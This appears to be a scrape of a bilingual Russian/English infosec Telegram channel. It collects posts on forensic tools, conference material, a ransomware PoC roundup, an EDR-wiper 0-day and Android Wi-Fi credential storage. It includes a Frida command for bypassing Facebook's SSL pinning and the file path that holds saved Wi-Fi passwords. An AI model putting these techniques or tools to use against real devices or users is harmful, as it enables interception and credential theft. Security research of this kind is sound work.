(RawCopy), also the command line processing is more "correct", a simple example: you can compare how RawCopy and rawccopy indexes are processed, that in the first case we get a limit on the number of digits in the hard/volume/partition index(in the /FileNamePath:) parameter , i.e. according to the specification, we can specify /FileNamePath:HarddiskVolume666, in the case of RawCopy, it will not work, and in rawccopy there are no problems with this. And what many might have encountered, RawCopy has very mediocre support for compressed files, which was solved in rawccopy and the result of the work is much more obvious and expected, although the interface for interaction has not been changed, but only inconsistencies in the Windows specification have been given in some places.#DFIR #forensics #RawCopy #diskReading #NTFS
2022-12-09 13:42:43
|Сыро-скомкано, но мы вытащим.|🕵️‍♂️Данный небольшой пост посвящен опенсоурс инструментам, которые используются для побитового копирования данных диска или тома, который хранится в одном или нескольких файлах с помощью различных низкоуровневых методов(RawCopy в простонародье). ⚙️RawCopy - популярный инструмент для копирование файлов с томов NTFS(чтение осуществляется благодаря лоу-левел методу), советую аккуратно использовать, так как давно были выявлены проблемы в логике извлечения данных с носителя.⚙️RawDiskCopier - инструмент для копирования данных с одного харда на другой(как планировалось изначально, твердотельные накопители при желании тоже можно), иногда не плохо работает с неисправными хардами(поврежденные сектора, соответственно от количества таких секторов зависит время потраченное на копирование данных из-за перечитывания сектора за сектором и логики обработки ошибок, предусмотренной при проектировке харда)⚙️ntfsDump - копирование файлов из тома с NTFS-раздела происходит за счет чтения сырого(raw) тома(открывается дескриптор для чтения тома полностью) и парсинга/анализа NTFS структур. Понятное дело, что для корректной работы нужно запускать из под админа(для байпасса: DACL, блокировки дескрипторов чтения, SACL и т.д.).⚙️rawccopy - по сути портированная на C версия RawCopy, только покрывающие некоторые ошибки. Но после ознакомления я понял, что разница большая и сама по себе логика извлечения была переработана(RawCopy), также работа обработка командной строки более "корректное", простой пример: можно сравнить как обрабатывает индексы RawCopy и rawccopy, что в первом случае мы получаем ограничение по количеству цифр в индексе харда/тома/раздела(в параметре /FileNamePath:) , т.е. по спецификации мы можем указать /FileNamePath:HarddiskVolume666, в случае же с RawCopy это не заработает, а в rawccopy никаких проблем с этим нет. И то, с чем могли столкнуться многие, RawCopy - имеет очень посредственную поддержку сжатых файлов, что было решено в rawccopy и результат работы много более очевиден и ожидаем, хотя интерфейс для взаимодействия не был изменен, а лишь были приведены в некоторых местах несоответствия спецификации Windows.#DFIR #forensics #RawCopy #diskReading #NTFS
2022-12-09 13:42:23
#DFIR #forensics #RawCopy #diskReading #NTFS
2022-12-08 22:54:17
🔥Black Hat Europe 2022Пароль/Password: ShizoPrivacy📺Black Hat Europe 2022 YouTube playlist(записей выступлений пока нет/there are no recordings of performances yet).#BHeu2022 #Exploitation #vulnerability #security #0day #vehicle #EDR #AV #Web #Embedded #Linux #Android #Windows
2022-12-08 22:50:40
🎩Собрал все доступные презентации с Black Hat Europe 2022 в один архив.🎩Collected all available presentations from Black Hat Europe 2022 in one archive.#BHeu2022 #Exploitation #vulnerability #security #0day #vehicle #EDR #AV #Web #Embedded #Linux #Android #Windows
2022-12-08 13:13:07
🛡Только в ознакомительных целях!🔥🔥🔥Еще один камень в огород с AV/EDR решениями(после установки увиличивается поверхность атаки), не имея прав администратора мы можем превратить AV/EDR в wiper благодаря найденным 0-days в оных и удалять почти любые файлы и машина(ОС) у жертвы становится unbootable. 🔖Пощупать можно тут. Доклад с выступления прикладываю ниже.🛡For educational purposes only!🔥🔥🔥Another stone in the garden with AV/EDR solutions (after installation, the attack surface is evaded), without administrator rights, we can turn AV/EDR into a wiper thanks to the 0-days found in them and delete almost any files and the victim's machine (OS) becomes unbootable.🔖You can feel it here. I attach the report from the speech below.
2022-12-08 12:29:36
🔥The second version of Game Of Active directory is out!💥GOAD - part 1 - reconnaissance and scan💥GOAD - part 2 - find users💥GOAD - part 3 - enumeration with user💥GOAD - part 4 - poison and relay💥GOAD - part 5 - exploit with user💥GOAD - part 6 - ADCS💥GOAD - part 7 - MSSQL💥GOAD - part 8 - Privilege escalation💥GOAD - part 9 - Lateral move💥GOAD - part 10 - Delegations💥GOAD - part 11 - ACL
2022-12-06 19:12:02
📕A clustering method for graphical handwriting components and statistical writership analysis#stylometry #forensics #identification
2022-12-06 19:11:28
|handwriter package|🕵️‍♂️Continuing the topic of stylometry(posts on the channel: click and click), do not forget about the analysis of handwritten text to identify the suspect.In this post, the methods of stylometry for handwritten text will not be touched upon, but only a tool supplied in the form of a package - handwriter, which is essentially part of a system aimed at helping law enforcement agencies to reduce the time for stylometric analysis of handwritten text (a little "butter", but only for clarity). This tool is being developed by the Center for Statistics and Applications in Forensic Evidence (CSAFE) of the University of IowaIf you do not dig into the wilds, then the semi-automatic process of analyzing handwritten text usually consists of three components:💾Data collection. The actual process, during which we collect as many handwritten texts of the suspect/suspects as possible, then scan/photograph them and bring them into a form satisfying for the tools used.💾We run the obtained images in a suitable form through the computational tools💾Static analysis to identify the author based on the above set of texts (potential authors). Handwriter can be integrated into the process described above at the calculation stage and the following things happen during the operation of the tool:💥Transformation of the scanned handwritten text into a black-and-white image (binarization) 💥The size of the record is reduced to a skeleton with a width of 1 pixel (skeletonization)💥The associated handwritten text is divided into graphs with nodes and edges, with frequently used Latin letters (splitting into graphs)💥Measurement takes place on each graph (distance from edge to edge, distance between graphs, measurement of graph centers and clustering method for K-medium)⚠️Important! Handwriter currently works only on the basis of a closed data set.🔖 To implement the handwritten text analysis process, I am applying supporting papers from CSAFE of the University of Iowa on this issue.#stylometry #forensics #identification
2022-12-06 19:11:18
|handwriter package|🕵️‍♂️Продолжая тему стилометрии(посты на канале: тык и тык), не стоит забывать про анализ рукописного текста для идентификации подозреваемого.В этом посте не будут затронуты методы стилометрии для рукописного текста, а лишь инструмент, поставляемый в виде пакета - handwriter, который по сути является частью системы, направленной на помощь правоохранительным органам для сокращения времени на стилометрический анализ рукописного текста(немного "масла масленого", но лишь для наглядности). Сей инструмент разрабатывается Центром Статистики и Приложений в Криминалистических Доказательств(Center for Statistics and Applications in Forensic Evidence, CSAFE) Университета штата Айова.Если не закапываться в дебри, то полуавтоматический процесс анализа рукописного текста обычно состоит из трех компонентов:💾Сбор данных. Собственно процесс, в ходе которого мы собираем как можно больше рукописных текстов подозреваемого/подозреваемых, затем сканируем/фотографируем их и приводим в удовлетворяющий для используемого инструментария вид.💾Прогоняем полученные изображения в пригодном виде через вычислительный инструментарий💾Статический анализ для идентификации автора на основе вышеописанного набора текстов(потенциальных авторов). Handwriter можно интегрировать в вышеописанный процесс на этапе вычислений и происходят следующие вещи в ходе работы инструмента:💥Превращение полученного отсканированного рукописного текста в черно-белое изображение(бинаризация) 💥Размер записи уменьшается до скелета шириной в 1 пиксель(скелетонизация)💥Связанный рукописный текст разбивается на графы с узлами и ребрами, с часто используемыми латинскими буквами(разбивание на графы)💥На каждом графе происходит измерение(расстояние от края до края, расстояние между графами, измерение центров графов и метод кластеризации для K-средних)⚠️Важно! Handwriter в данный момент работает только на основе закрытого набора данных.🔖Для реализации процесса анализа рукописного текста, прикладываю вспомогательные работы работы от CSAFE Университета штата Айова по данному вопросу.#stylometry #forensics #identification
2022-12-06 19:11:01
#stylometry #forensics #identification
2022-12-06 12:29:50
Подскажу. Сохраненные сети:/data/misc/apexdata/com.android.wifi/WifiConfigStore.xmlПароль от сети в строке со значением "PreSharedKey".Ну и раз уж зашел разговор, расскажу об еще одном интересном файле, нарисую чисто гипотетическую ситуацию и все вместе сделаем выводы.Если сходите по пути /data/misc_ce/0/apexdata/com.android.wifi/WifiConfigStore.xml, то обнаружите там еще один занятный файл. А именно файл, в котором зафиксированы все открытые точки доступа, которые ваш смартфон обнаружил при сканировании сети, когда вы гуляли по городам и весям, и в радиусе действия которых вы пробыли продолжительное время (это важно). Забыв отключить модуль WiFi на устройстве. Тут будут записи о всяких торговых центрах и барах, где вы побывали, об электричке Ласточка, в которой вы ехали и все в этом духе.Итак, ситуация.Допустим, я сотрудник китайской ФСБ, достойный член партии и верный последователь заветов Мао. Мне нужно выявить всех этих проклятых повстанцев, которые партию не слушаются, ходить в ковидных намордниках не хотят и жить в карантинном бараке, собирая Айфоны, не желают. Но повстанцы, деланые хитрым китайским пальцем, или симки к чертям повытаскивали и радиомодули поотрубали, прежде чем идти свои протесты митинговать, или юзают смартфоны со сменным IMEI. В общем через верного партии и народу ОПСОСа их к уравнению "голова=пуля" не подтянешь.Но при этом юзают эти мерзкие негодяи для координации протестов свои антипартийные mesh-сети или забыли WiFi на устройстве отключить, когда вышли на улицу. Я, как учит партия, создаю в районе протестной акции открытые точки доступа Mao1, Mao2...Mao10 и располагаю их по условному периметру и внутри него. Все устройства, на которых активирован модуль WiFi, в пассивном режиме, независимо от настроек ограничения поиска сетей, сканируют WiFi-окружение и заносят в упомянутый выше файл информацию о моих точках Mao. Заносят не сразу, а по прошествии определенного времени, но сути это не меняет. И файл этот будет храниться на устройстве до прихода коммунизма во всем мире.В один прекрасный день, надев белый халат, я постучусь к кому-нибудь в дверь, и под предлогом проверки QR-кода, или просто потому что "так надо", подрублю устройство потенциального негодяя к разработанному партией комплексу для извлечения данных. Или установлю на него приложение "Партия против короновируса и за народ", с охрененными "преференциями" в системе. Тем самым получу доступ к дампу памяти, включая дважды упомянутый файл. И если я обнаружу в этом файле строки с записью "Мао", будет мне миска риса, а негодяю пуля в голову на стадионе и счет родственникам за потраченную государством пулю.Я во многом упростил, но суть послания - проебаться можно в таких мелочах, о которых ты и понятия не имеешь, WiFi, Bluetooth и прочие блага цивилизации должны автоматически отключаться, если не используются, а открытые точки доступа губительны для повстанцев.P.S. Тут еще интересно, если кому интересно почему рандомизация MAC-адреса - вещь очень даже нужная http://habrahabr.ru/post/253335/
2022-12-05 13:16:13
🔥Bypass Facebook SSL pinning on Android devices.💥Supported ABIs: x86, x86_64, armeabi-v7a & arm64-v8a⚠️You need to uninstall the Facebook app before trying to install it, if Facebook is installed as a system app then you can not uninstall it without root so this method will not work in that case.Run using Frida (Requires Root):frida -U -l .\facebook-ssl-pinning-bypass.js -f com.facebook.katana --no-pause
2022-12-05 12:53:07
🔓Backdooring Post-Quantum Cryptography: Kleptographic Attacks on Lattice-based KEMsНебольшая работа про постквантовую криптографию, демонстрирующая первую практическую Клептографическую атаку на метод инкапсуляции ключей(KEM) Kyber, которая позволяет внедрять бэкдоры в Kyber(процедура генерации ключа). В случае успешного внедрения бэкдора, атакующий получает возможность узнавать секретный ключ на основе неправильно сгенерированных открытых ключей из-за внедренного им бэкдора. Также, в работе можно увидеть практический пример атаки данного рода на уровне протокола, в данном случае - TLS 1.3#cryptography #PostQuantumCryptography #backdoor
2022-12-05 12:52:46
🔓Backdooring Post-Quantum Cryptography: Kleptographic Attacks on Lattice-based KEMsA small work about post-quantum cryptography, demonstrating the first practical Kleptographic attack on the Kyber key encapsulation (KEM) method, which allows the introduction of backdoors into Kyber (key generation procedure). In the case of a successful backdoor implementation, the attacker gets the opportunity to learn the secret key based on incorrectly generated public keys due to the backdoor he has implemented. Also, in the work you can see a practical example of an attack of this kind at the protocol level, in this case TLS 1.3#cryptography #PostQuantumCryptography #backdoor
2022-12-05 11:56:41
|EKTotal|🕵️‍♂️Написав про визуализацию захваченного сетевого трафика здесь, забыл упомянуть про вспомогательный инструмент для анализа трафика на наличие атак Drive-by Download. Сей инструмент называется EKTotal и если говорить более предметно, то он имеет под капотом механизм эвристического анализа(по сути основанный на исследованиях сплойт китов с 2017 года), позволяющий извлекать код как вредоносов в целом, так и сплойтов, идентифицировать сплоит киты по типу RIG и Magnitude(расшифровывая код), а также идентифицировать более десяти типов атак по типу Seamless и Fobos. Помимо всего прочего, можно самостоятельно дописать/переписать код для обнаружения в трафике более свежих сплойтов, так как инструмент более года не поддерживается(последняя версия 2.0.0 так вовсе в 2019 году вышла). В использовании очень прост: скармливаем pcap или saz, ждем и получаем результат. Также за счет функции Lazy Gate Estimation, добавленной в версии 2.0.0, можно с еще большей простотой воспроизводить полученный сетевой трафик. При желании в ходе сборки можем указать VT API для отправки сэмплов на VT.🕵️‍♂️Having written about the visualization of captured network traffic here, I forgot to mention the auxiliary tool for analyzing traffic for the presence of Drive-by Download attacks. This tool is called EKTotal, and speaking more specifically, it has a heuristic analysis mechanism under the hood (in fact, based on the research of exploit kits since 2017), which allows you to extract the code of both malware in general and exploits, identify exploit kits by type RIG and Magnitude (decrypting the code), as well as identify more ten types of attacks by type Seamless and Fobos. Among other things, you can independently add/rewrite the code to detect more recent exploits in traffic, since the tool has not been supported for more than a year (the latest version 2.0.0 was released in 2019). It is very simple to use: we feed pcap or saz, wait and get the result. Also, due to the Lazy Gate Estimation function added in version 2.0.0, it is possible to reproduce the received network traffic with even greater ease.If desired, during the build, we can specify the VT API to send samples to VT.#forensics #networkAnalysis #pcap #exploit #malware
2022-12-05 11:56:33
#forensics #networkAnalysis #pcap #exploit #malware
2022-12-02 18:24:26
Ох, это ты до сих пор читаешь бред Шизо? 😉Хочется пожелать тебе разобраться во внутренних проблемах, если таковые имеются в проявленной форме, и как же выходные без прекрасного по-своему для каждого отдыха? Как ты знаешь, держу за всех вас кулачки, мои дорогие, чтобы было все хорошо и вы не опускали руки.Oh, are you still reading the nonsense of the Shizo? 😉I would like to wish you to sort out your internal problems, if there are any in the manifested form, and what about a weekend without a beautiful one in its own way for each holiday? As you know, I hold my fists for all of you, my dear ones, so that everything is fine and you do not give up.
2022-12-02 18:00:24
💥1day link Private Shizo(fully free)
2022-12-02 16:33:42
|AppSec Ezine|📰459rd EditionRelease Date: 02/12/2022pathonprojectgithub#ezine #appsec #infosec
2022-12-01 21:40:56
|GeoDesk|🕵️‍♂️Разведчик, хочешь быстро делать запрос для получения геопространственной информации(географические объекты)? Наверное, еще и без боли при ознакомлении каким образом можно взаимодействовать с этой БД для OSM(OpenStreetMap), чтобы прям загрузил, потратил немного времени на написание простейшего приложения и в бой?Все это и не только позволяет делать GeoDesk(написан на Java, для работы нужен установленный как минимум 16-й версии JVM), по сути являясь механизмом геопространственной БД для данных OSM. Начать стоит с того, что библиотека географических объектов(Geographic Object Library, GOL) предоставляет возможно хранить необходимые данные, используя меньший объем хранилища по сравнению с SQL(которая кушает не редко более чем в десять раз больше), а сам объем файлов GeoDesk GOL превышают в среднем от 10 до 50% по сравнению с исходными данными OSM(PBF-формат, .osm.pbf) и помимо этого, преобразование этих данных в GOL в 20 раз быстрее, чем если бы взяли и импортировали бы в БД SQL(если нам нужны только готовые фрагменты по определенным регионам, то тоже без проблем). В начале писал про быстроту запросов, по сути прирост в десятки раз по сравнению с SQL(у разработчиков выходило достигать преимущества в 50 раз).Что же с простотой? Благодаря действительно простому в понимании API(примеры приложений) мы можем легко и непринужденно находить теги, пути-узлы и члены отношения без необходимости в объектно-реляционном отображении(не нужно создавать виртуальные объекты БД, которые создаются путем связывания БД с концепциями ООП) и при всем этом обработка отношений происходит корректно, воспроизводя в достаточной мере модель данных OSM. Руководство расположено тут.⚠️Для создания и поддержки GOL, выполнения запросов GOQL и экспортирования их производных результатов потребуется воспользоваться gol-tool 📺Демо-видео: GeoDesk для OpenStreetMap.🕵️‍♂️Intelligence officer, do you want to quickly make a request for geospatial information (geographical objects)? Probably also without pain when familiarizing yourself with how you can interact with this database for OSM (OpenStreetMap) so that you download it straight, spend a little time writing the simplest application and go into battle?All this and not only allows you to do GeoDesk (written in Java, you need at least the 16th version of the JVM installed to work), in fact being a geospatial database mechanism for OSM data.It's worth starting with the fact that the Geographic Object Library (GOL) makes it possible to store the necessary data using a smaller storage volume compared to SQL (which eats more than ten times more often), and the volume of Autodesk GOL files itself exceeds on average from 10 to 50% compared to the original OSM data (PBF format, .osm.pbf) and in addition, the conversion of this data to GOL is 20 times faster than if we took and imported it into the SQL database (if we only need ready-made fragments for certain regions, then also without problems). In the beginning I wrote about the speed of queries, in fact, an increase of ten times compared to SQL (developers managed to achieve an advantage of 50 times).What about simplicity? Thanks to a really easy-to-understand API (application examples), we can easily and easily find tags, node paths and relationship members without the need for object-relational mapping (no need to create virtual database objects that are created by linking databases with OOP concepts) and with all this, the relationship processing occurs correctly, reproducing sufficiently measure the OSM data model. The tutorial is located here.⚠️To create and maintain GOL, execute GOQL queries and export their derived results, you will need to use the gol-tool📺Demo video: GeoDesk for OpenStreetMap.#Intelligence #GEOINT #OpenStreetMap
2022-12-01 21:40:46
#Intelligence #GEOINT #OpenStreetMap
2022-11-29 21:51:36
|Are you ready for the harmful ransomware gang?|🛡 For educational purposes only!💥This post includes several projects (repositories) on github, which are POCs ransomware, and it seems to me that some of the detection of security protection in the company can be checked (of course, on a special stand configured as workstations in the company), using them and of course developing on the basis of tests - countermeasures. Exploits, payloads, and in general methods/methods/techniques for obtaining primary access to the system are not considered in this post.Below I attach a list of projects (some have already been on one of the channels) and a brief description.🔐QuickBuck is a harmless (in fact, a dummy without real encryption or deleting shadow copies of volumes) simulator of ransomware activity with a basic functional and written in GO:💾Exploitation of dead technology with Word macros💾Deleting shadow copies of a volume💾Document encryption (embedded and transferred by the simulator to a new folder)💾On the desktop, according to the classics of the genre, a note about the cryptographer appears for the user with further actions🔐Ransomwhere - POC ransomware (written in GO), which has reduced functionality (encrypting/decrypting files, deleting their original version from the machine, we can specify the path to the directory with files for redemption and delete local snapshots during encryption) 🔐PSRansom is a ransomware simulator (written in PS), which, compared to the previous ones, has the capabilities of a C2 server that allows you to exfiltrate and receive information about the victim using the HTTP protocol.🔐RanSim is a ransomware simulator (written in PS) using the classic AES encryption algorithm (the key length is 256 bits) and recursive encryption/decryption of files in the target directory based on it🔐Ransom0 - ransomware (written in python), which consists of two parts: the server and the ransomware, which respectively also consist of several parts. The server consists of: ✨an SQL database for storing user data by type key, id digits and time; ✨an HTTP server with processing POST requests from the ransomware.The ransomware consists of the following parts:💾Search for files by extensions and save the path to path.txt💾Encrypting files in path.txt , generating the id digit, sending the key and id💾Decrypting files by requesting funds, waiting for the key and decrypting files if the key is correct💾Sending data to our HTTP server🔐CRYLINE-v5.0 is a pretty interesting ransomware (written in NASM, C and C++) for Windows, though with a weak encryption algorithm, but it doesn't matter.🔐Ultra - PoC encryption / decryption algorithm in the style of Conti and with due attention will not last long, but in its own way an interesting project, although not supported.⚠️Important! Most ransomware gangs do not use 0-day exploits, so updating the software products used, a correctly configured system, digital hygiene (with regular instruction and increased sanctions for non-compliance with it), AV, EDR, XDR-type defenses will not particularly protect against at least as many motivated attackers (there are just relevant methods on the second channel and methods: took and got access to the target, but only for informational purposes) and not infrequently increase the surface for attack (attack surface).Yes, and there is a rather sophisticated cyber criminal contingent, but this is a rather rare phenomenon.#ransomware #security #expoitation #cryptography #BlueTeam #RedTeam
2022-11-29 21:50:57
|Ты готов к вредным рансом-бандам?|🛡Только в ознакомительных целях!💥Этот пост включает несколько проектов(репозиториев) на гитхабе, являющихся PoCs рансомаври и как мне кажется некоторую часть с обнаружением средствами защиты защиты в компании можно проверить(конечно же на специальном стенде, сконфигурированном, как рабочие станции в компании), используя их и конечно разработка на основании тестов - контрмер. Эксплоиты, пэйлоады и в целом методы/способы/техники получения первичного доступа к системе не рассматриваются в этом посте.Ниже прикладываю список проектов(некоторые уже были на одном из каналов) и краткое описание.🔐QuickBuck - безобидный(по сути пустышка без настоящего шифрования или удаления теневых копий томов) симулятор активности шифровальщика с базовым фунционалом и написан на GO:💾Эксплуатация мертвой техники с макросами Word💾Удаление теневых копий тома💾Шифрование документов(встраивается и перебрасывается симулятором в новую папку)💾На рабочем столе по классике жанра появляется заметка о шифровальщике для пользователя с дальнейшими действиями🔐Ransomwhere - PoC шифровальщика(написан на GO), который имеет урезанный функционал(шифрование/расшифровывание файлов, удаление их оригинальной версии с машины, можем указать путь к каталогу с файлами для выкупа и во время шифрования удалять локальные снэпшоты) 🔐PSRansom - симулятор шифровальщика(написан на PS), который по сравнению с предыдущими имеет в наличии возможности C2 сервера, позволяющий эксфильтровать и получать информацию о жертве с использованием HTTP-протокола.🔐RanSim - симулятор шифровальщика(написан на PS) с использованием классического алгоритма шифрования AES(длина ключа - 256 бит) и основанном на нем рекурсивном шифровании/расшифровывании файлов в целевом каталоге🔐Ransom0 - шифровальщик(написан на питоне), который состоит из двух частей: сервер и шифровальщик, которые соответственно тоже состоят из нескольких частей. Сервер состоит из: ✨БД SQL для хранения пользовательских данных по типу ключ, цифры id и время; ✨HTTP сервер с обработкой POST-запросов от шифровальщика.Шифровальщик состоит из следующих частей:💾Поиск файлов по расширениям и сохранения пути в path.txt💾Шифрование файлов в path.txt, генерирование цифры id, отправление ключа и id💾Расшифровывание файлов путем запроса денежных средств, ожидание ключа и расшифровка файлов в случае корректности ключа💾Отправка к нам данных на HTTP-сервер🔐CRYLINE-v5.0 - довольно интересный шифровальщик(написан на NASM, C и C++) под винду, правда с слабым алгоритмом шифрования, но это не беда.🔐Ultra - PoC алгоритма шифрования/расшифровывания в стиле Конти и при должной внимании не проживет долго, но по-своему интересный проект, хоть и не поддерживается.⚠️Важно! Большинство ransomware gangs не используют 0-day эксплоиты, поэтому обновление используемых программных продуктов, корректно сконфигурированная система, цифровая гигиена( с регулярным инструктажем и повышение санкций за несоблюдение оной), средства защиты по типу AV, EDR, XDR не особо защитят от хоть сколько мотивированных атакующих(на втором канале есть как раз актуальные методы и способы: взял и получил доступ к таргету, но только в ознакомительных целях) и не редко повышают поверхность для атаки(attack surface).Да и бывает довольно изощренный кибер криминальный контингент, но это довольно редкое явление. #ransomware #security #expoitation #cryptography #BlueTeam #RedTeam
2022-11-29 21:50:49
🔐Ты готов к вредным рансом-бандам?🔐Are you ready for the harmful ransomware gang?#ransomware #security #expoitation #cryptography #BlueTeam #RedTeam
2022-11-28 03:58:24
|MFD 2022|Лучше поздно, чем никогда.Кратко и по существу.🔥Хочется поблагодарить организаторов MFD 2022(канал в телеграме тут) за проведенную конференцию, а также ВСЕХ тех, с кем удалось пообщаться в ходе нее и после завершения. Начну со своего выступления, не буду оправдываться как-то, прошло оно не очень в силу моего волнения и недостаточно добротных приготовлений. Все бывает впервые, надеюсь что получится еще раз выступить на MFD или другой конференции от MKO systems(ранее оксиджен софтвер, оксигены) , на всякий уже есть сильно переработанный материал( при каких-то сильных изменениях в актуальных методах или появлении новых будет изменен), да и уже будет попроще в какой-то степени.Из всех выступлений мне больше всего понравилось Владимира Каталова( генеральный директор Elcomsoft), с его докладом про извлечение данных из яблокофонов и их превращение в доказательства. Основной причиной послужило интересное рекламирование продукта в совокупности с технической информацией, предоставленной не на "сухую". Озвучу тезис, который прозвучал в конце конференции от одного посетителя конференции про отсутствие (НЕ)рекламных докладов, за исключением моего слабого выступления(не отрицаю ни капли). Хотелось увидеть побольше технических докладов, но это лишь хотелка и все-равно у меня остались очень теплые воспоминая❤️.И да выступать - не посты писать😉Better late than never.Briefly and to the point.🔥I would like to thank the organizers of MFD 2022 (telegram channel here) for the conference, as well as ALL those with whom I managed to communicate during it and after the end. I'll start with my speech, I won't make excuses somehow, it didn't go very well due to my excitement and not enough good preparations. Everything happens for the first time, I hope that it will be possible to speak again at MFD or another conference from MKO systems (formerly oxygen software, oxygens), just in case there is already a heavily recycled material (with some strong changes in current methods or the appearance of new ones will be changed), and it will already be easier to some extent.Of all the speeches, I liked Vladimir Katalov (CEO of Elcomsoft) the most, with his report on extracting data from apple phones and turning them into evidence. The main reason was the interesting advertising of the product in conjunction with technical information provided not on a "dry" basis. I will voice the thesis that was voiced at the end of the conference from one conference visitor about the absence of (NON) promotional reports, with the exception of my weak performance (I do not deny a drop). I wanted to see more technical reports, but this is just a wish and still I have very warm memories❤️And yes, to speak - not to write posts😉#MFD2022 #forensics #shizo
2022-11-28 03:48:06
#MFD2022 #forensics #shizo
2022-11-25 19:28:33
😉Дорогой подписчик или странствующий читатель. Хочется пожелать тебе отличного отдыха и продуктивных выходных. Пусть ничто и никто не помешает тебе провести время с пользой и надеюсь, что у тебя все хорошо, а если и не так, то ты сам знаешь что многое зависит от тебя и не опускай руки.Шизо.😉Dear subscriber or traveling reader. I would like to wish you a great rest and a productive weekend. Let nothing and no one prevent you from spending time with benefit and I hope that everything is fine with you, and if it's not, then you yourself know that a lot depends on you and do not give up.Shizo.
2022-11-25 13:57:44
📕Guidelines for Digital Forensics First Responders#DFIR #forensics #electronicEvidence #digitalEvidence #IoT #Smartphones #iOS #Android #Storage #Drones #automotive #Interpol
2022-11-25 13:57:30
|Guidelines for Digital Forensics First Responders|🕵️‍♂️Сие руководство, предоставленное Интерполом поможет начинающим и не совсем форензик-специалистам(цифровая криминалистика) надлежащим образом обращаться с цифровыми/электронными доказательствами, каким образом нужно использовать цифровые доказательства когда мы выполняем подготовительные меры к обыску и дальнейшему изъятию цифровых носителей информации с последующим криминалистическим анализом и соответственно на этапе исполнительных мероприятий. Так что, если были вопросы: "как собирать надлежащим образом цифровые/электронные доказательства?", "как сохранить надлежащим образом цифровые/электронные доказательства?" и "как транспортировать надлежащим образом цифровые/электронные доказательства?", то рекомендую прочитать руководство, причем не мало уделяется моменту с сохранением цифровых/электронных доказательств , чтобы ваши коллеги могли их спокойно использовать в уголовном расследовании и пришли в суд с ними, не боясь об отклонении оных в качестве доказательства неправомерных действий подсудимого.⚠️Но это все не означает, что все содержимое можно применять без изменений и придется в любом случае опираться на нормативку, административные, процедурные, доказательственные и иные требования к обыску, аресту, цепочке содержания под стражей, анализу, отчетности действующих на территории РФ и которые в большей степени представлены в уголовном/прокурорском/судебном процессе. И помимо всего прочего в руководстве приводятся примеры ПО для реализации этих мероприятий.⬇️Методичку прикладываю ниже.🕵️‍♂️This guide provided by Interpol will help beginners and not quite forensic specialists (digital forensics) to properly handle digital /electronic evidence, how to use digital evidence when we carry out preparatory measures for the search and further seizure of digital media with subsequent forensic analysis and, accordingly, at the stage of enforcement actions. So if there were questions: "how to properly collect digital/electronic evidence?", "how to properly store digital/electronic evidence?" and "how to transport digital/electronic evidence properly?", then I recommend reading the manual, and not a little attention is paid to the moment with the preservation of digital/electronic evidence, so that your colleagues can safely use them in a criminal investigation and come to court with them, without fear of rejecting them as evidence of the defendant's unlawful actions.⚠️But all this does not mean that all the contents can be applied unchanged and in any case will have to rely on the regulations, administrative, procedural, evidentiary and other requirements for search, arrest, chain of custody, analysis, reporting operating in the territory of the Russian Federation and which are more represented in criminal/prosecutorial/ judicial proceedings. And among other things, the manual provides examples of software for the implementation of these activities.⬇️I attach the guidelines below.#DFIR #forensics #electronicEvidence #digitalEvidence #IoT #Smartphones #iOS #Android #Storage #Drones #automotive #Interpol
2022-11-25 13:55:06
#DFIR #forensics #electronicEvidence #digitalEvidence #IoT #Smartphones #iOS #Android #Storage #Drones #automotive #Interpol
2022-11-25 12:33:19
|AppSec Ezine|📰458rd EditionRelease Date: 25/11/2022pathonprojectgithub#ezine #appsec #infosec
2022-11-25 00:51:17
|Dismember|- Те обстоятельства, которые на первый взгляд лишь усложняют дело, чаще всего приводят вас к разгадке. Надо только как следует, не по-дилетантски разобраться в них.- Those circumstances that at first glance only complicate the case, most often lead you to a solution. It is only necessary to understand them properly, not amateurishly.🕵️‍♂️Холмс, ищешь в памяти всех процессов(*nix-like) на машине негодяя его секреты и хочешь узнать то, чего не знают другие? На помощь приходит инструментарий(Dismember, "/proc"), который находит секреты ушлого негодяя путем поиска в памяти всех процессов на наличие общих секретов, до которых наши руки доходят, Ватсон. Поэтому лучше запускать из под рута для большего охвата. Помимо прочего, можно воспользоваться grep(настолько просто и очевидно, Ватсон) для сопоставления регулярных выражений по памяти до которой наши руки и находить сокровенные информацию негодяя в памяти и не только. А еще этот инструментарий, Ватсон, нам поможет в составлении списка процессов, просмотре состояния процесса и связанной с ним информации, строить дерева процессов и найти собаку Баскервилей, используя таинственные команды.⚠️Ватсон, я забыл упомянуть главное - сей инструментарий должен использоваться только в благих целях.🕵️‍♂️Holmes, are you looking for his secrets in the memory of all processes (*nix-like) on the scoundrel's machine and want to find out what others don't know? The toolkit (Dismember, "/proc") comes to the rescue, which finds the secrets of a cunning scoundrel by searching the memory of all processes for the presence of common secrets that our hands reach, Watson. Therefore, it is better to run from under the root for greater coverage. Among other things, you can use grep(so simple and obvious, Watson) to match regular expressions from memory to which our hands and find the scoundrel's innermost information in memory and not only. And this toolkit, Watson, will help us in compiling a list of processes, viewing the status of the process and related information, building process trees and finding the Baskervilles dog using mysterious commands.⚠️Watson, I forgot to mention the main thing - this toolkit should be used only for good purposes.#SherlockHolmes #secrets #forensics #memoryScan #processes
2022-11-25 00:51:07
#SherlockHolmes #secrets #forensics #memoryScan #processes
2022-11-25 00:02:18
|C2 Tracker|🕵️‍♂️Наткнулся на довольно простой скрипт, использующий поисковые запросы, приведенные в статьях Майкла Кочвары(первая, вторая) для сбора IP-адресов подозрительных C2 серверов, подтягивая Shodan.Перед запуском скрипта на своей машине необходимо в 5-й строке кода вставить в соответствующее поле ваш API ключ Шодана. После чего устанавливаем необходимые пакеты, если не стоят:pip3 install -r requirements.txtИ можем пользоваться:python3 tracker.py🕵️‍♂️I came across a fairly simple script using the search queries given in Michael Kochvara's articles (first, second) to collect the IP addresses of suspicious C2 servers, pulling up Shodan.Before running the script on your machine, you need to insert your Shodan API key in the appropriate field in the 5th line of the code. After that, install the necessary packages, if they are not:pip3 install -r requirements.txtAnd we can use:python3 tracker.py#DFIR #Shodan #C2 #CobaltStrike #MSF #Covenant #Mythic #BRC4 #Posh
2022-11-23 12:51:06
🕵️‍♂️Занимательный документ, содержащий информацию об использовании Пегасуса от NSO Group силами ФБР для «исследований и разработок»(так и поверили). Конечно, много данных скрыто, думаю не мало кого заинтересует небольшая переписка между Уайденом(сенатор) и Крисом Рэем(директор ФБР).🕵️An entertaining document containing information about the use of Pegasus from the NSO Group by the FBI for "research and development"(so they believed). Of course, a lot of data is hidden, I think not a few people will be interested in a small correspondence between Wyden (senator) and Chris Ray (FBI director).#spyware #surveillance #NSO #FBI #USA #Israel #PegasusSpyware #Predator
